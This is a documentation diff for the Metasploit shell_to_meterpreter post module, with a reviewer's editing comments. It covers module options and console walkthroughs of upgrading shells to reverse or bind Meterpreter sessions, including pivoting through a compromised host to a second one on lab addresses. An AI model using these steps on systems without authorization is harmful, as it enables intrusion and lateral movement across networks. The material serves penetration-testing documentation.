|
| 1 | +shell_to_meterpreter allows you to upgrade a shell session to Meterpreter. It can be launched as |
| 2 | +a post module, or from the sessions command. By default, this module will use a reverse |
| 3 | +Meterpreter. |
| 4 | + |
| 5 | +## Important Options |
| 6 | + |
| 7 | +**HANDLER** |
| 8 | + |
| 9 | +The handler option is for starting a multi/handler to receive the connection. By default this is |
| 10 | +true, because you will need it. But if for some reason if you're setting one separately, you may |
| 11 | +want to consider having it as false. |
| 12 | + |
| 13 | +**LHOST** |
| 14 | + |
| 15 | +The LHOST option is for the reverse Meterpreter you are upgrading to. By default, the module can |
| 16 | +figure it out for you. But over a pivot, you will need to manually set this, because session |
| 17 | +objects don't necessarily have that information. |
| 18 | + |
| 19 | +**LPORT** |
| 20 | + |
| 21 | +The LPORT option is also for the reverse Meterpreter you are upgrading to. |
| 22 | + |
| 23 | +**PAYLOAD_OVERRIDE** |
| 24 | + |
| 25 | +This is an advanced option. If you don't want to use the default reverse Meterpreter, then you can |
| 26 | +use this. |
| 27 | + |
| 28 | +## Scenarios |
| 29 | + |
| 30 | +**Using sessions -u** |
| 31 | + |
| 32 | +```sessions -u``` is the same as running the post module against a specific session. However, this |
| 33 | +is limited to using the default reverse Meterpreter payload, so you will not be able to use it |
| 34 | +via a pivot. |
| 35 | + |
| 36 | +Usage is rather simple. At the msf prompt, first off, read the sessions table to see which one you |
| 37 | +want to upgrade: |
| 38 | + |
| 39 | +``` |
| 40 | +msf > sessions |
| 41 | +
|
| 42 | +Active sessions |
| 43 | +=============== |
| 44 | +
|
| 45 | + Id Type Information Connection |
| 46 | + -- ---- ----------- ---------- |
| 47 | + 1 shell windows 192.168.146.1:4444 -> 192.168.146.128:1204 (192.168.146.128) |
| 48 | +
|
| 49 | +msf > |
| 50 | +``` |
| 51 | + |
| 52 | +In this demonstration, session 1 is a shell, so we upgrade that: |
| 53 | + |
| 54 | +``` |
| 55 | +msf > sessions -u 1 |
| 56 | +``` |
| 57 | + |
| 58 | +**Upgrading a shell via a pivot** |
| 59 | + |
| 60 | +This scenario is a little tricky, because the default options won't work over a pivot. The problem |
| 61 | +is that if you got a session with a bindshell, your LHOST will say "Local Pipe". And if you got it |
| 62 | +with a reverse shell, the LHOST is actually an IP range. Neither is an acceptable format for the |
| 63 | +LHOST option. |
| 64 | + |
| 65 | +There are two ways you can choose: either you must manually set LHOST, or you could choose a |
| 66 | +bind Meterpreter. The second is really easy, all you need to do is ```set PAYLOAD_OVERRIDE```. |
| 67 | + |
| 68 | +If you prefer to manually set LHOST, this should be the compromised host you're pivoting from. |
| 69 | +Perhaps a digram will help to explain this: |
| 70 | + |
| 71 | +``` |
| 72 | +|-------------| |-------------------| |-------------------| |
| 73 | +| Attacker | <---> | Compromised box A | <---> | Compromised box B | |
| 74 | +|-------------| |-------------------| |-------------------| |
| 75 | + 192.168.146.1 192.168.146.128 |
| 76 | + 192.168.1.101 (VPN) 192.168.1.102(VPN) |
| 77 | +``` |
| 78 | + |
| 79 | +In this example, let's start with breaking into box A (192.168.146.128): |
| 80 | + |
| 81 | +``` |
| 82 | +[*] Sending stage (957999 bytes) to 192.168.146.128 |
| 83 | +[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.128:1208) at 2016-04-28 22:45:09 -0500 |
| 84 | +
|
| 85 | +meterpreter > |
| 86 | +``` |
| 87 | + |
| 88 | +We decide that box A is on a VPN, with IP 192.168.1.101. Also, we found box B as 192.168.1.102. We |
| 89 | +need to create that pivot: |
| 90 | + |
| 91 | +``` |
| 92 | +msf > route add 192.168.1.1 255.255.255.0 1 |
| 93 | +[*] Route added |
| 94 | +``` |
| 95 | + |
| 96 | +And we break into box B (192.168.1.102) with a Windows bind shell: |
| 97 | + |
| 98 | +``` |
| 99 | +[*] Command shell session 2 opened (Local Pipe -> Remote Pipe) at 2016-04-28 22:47:03 -0500 |
| 100 | +``` |
| 101 | + |
| 102 | +Notice this says "Local Pipe", which means the box B's session object doesn't really know box A's IP. |
| 103 | +If you try to run shell_to_meterpreter this way, this is all you get: |
| 104 | + |
| 105 | +``` |
| 106 | +msf post(shell_to_meterpreter) > run |
| 107 | +
|
| 108 | +[*] Upgrading session ID: 2 |
| 109 | +[-] LHOST is "Local Pipe", please manually set the correct IP. |
| 110 | +[*] Post module execution completed |
| 111 | +``` |
| 112 | + |
| 113 | +To upgrade box B's shell, set LHOST to box A's 192.168.1.101. And that should connect correctly: |
| 114 | + |
| 115 | +``` |
| 116 | +msf post(shell_to_meterpreter) > run |
| 117 | +
|
| 118 | +[*] Upgrading session ID: 2 |
| 119 | +[*] Starting exploit/multi/handler |
| 120 | +[*] Started reverse TCP handler on 192.168.1.101:4433 via the meterpreter on session 1 |
| 121 | +[*] Starting the payload handler... |
| 122 | +[*] Sending stage (957999 bytes) to 192.168.1.102 |
| 123 | +[-] Powershell is not installed on the target. |
| 124 | +[*] Command stager progress: 1.66% (1699/102108 bytes) |
| 125 | +... |
| 126 | +[*] Command stager progress: 100.00% (102108/102108 bytes) |
| 127 | +[*] Meterpreter session 3 opened (192.168.146.1-192.168.146.128:4433 -> 192.168.1.102:1056) at 2016-04-28 22:50:56 -0500 |
| 128 | +``` |
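Review bot: The pivot example adds the route with a host address instead of a network address: `msf > route add 192.168.1.1 255.255.255.0 1` should read `route add 192.168.1.0 255.255.255.0 1` so the subnet matches the /24 mask the text describes (box A on 192.168.1.101, box B on 192.168.1.102). Two wording fixes in the same file: "if for some reason if you're setting one separately" has a doubled "if", and "Perhaps a digram will help" should be "diagram". In the `sessions -u` section it would also help to say which options that shortcut does not let you set, since the pivot section relies on exactly those two (a manual LHOST, or a bind Meterpreter via PAYLOAD_OVERRIDE) as the workarounds for the "Local Pipe" and IP-range LHOST values shown in the session output.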